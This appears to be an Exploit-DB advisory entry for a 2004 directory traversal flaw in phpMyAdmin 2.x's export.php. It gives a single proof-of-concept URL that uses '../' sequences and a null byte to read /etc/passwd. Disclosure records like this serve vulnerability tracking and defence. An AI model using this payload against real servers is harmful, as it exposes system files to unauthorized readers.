Lucene search

K
exploitdbCedric CochinEDB-ID:23640
HistoryFeb 03, 2004 - 12:00 a.m.

phpMyAdmin 2.x - 'Export.php' File Disclosure

2004-02-0300:00:00
Cedric Cochin
www.exploit-db.com
22

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/9564/info

phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter. 

http://www.example.com/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 

AI Score

7.4

Confidence

Low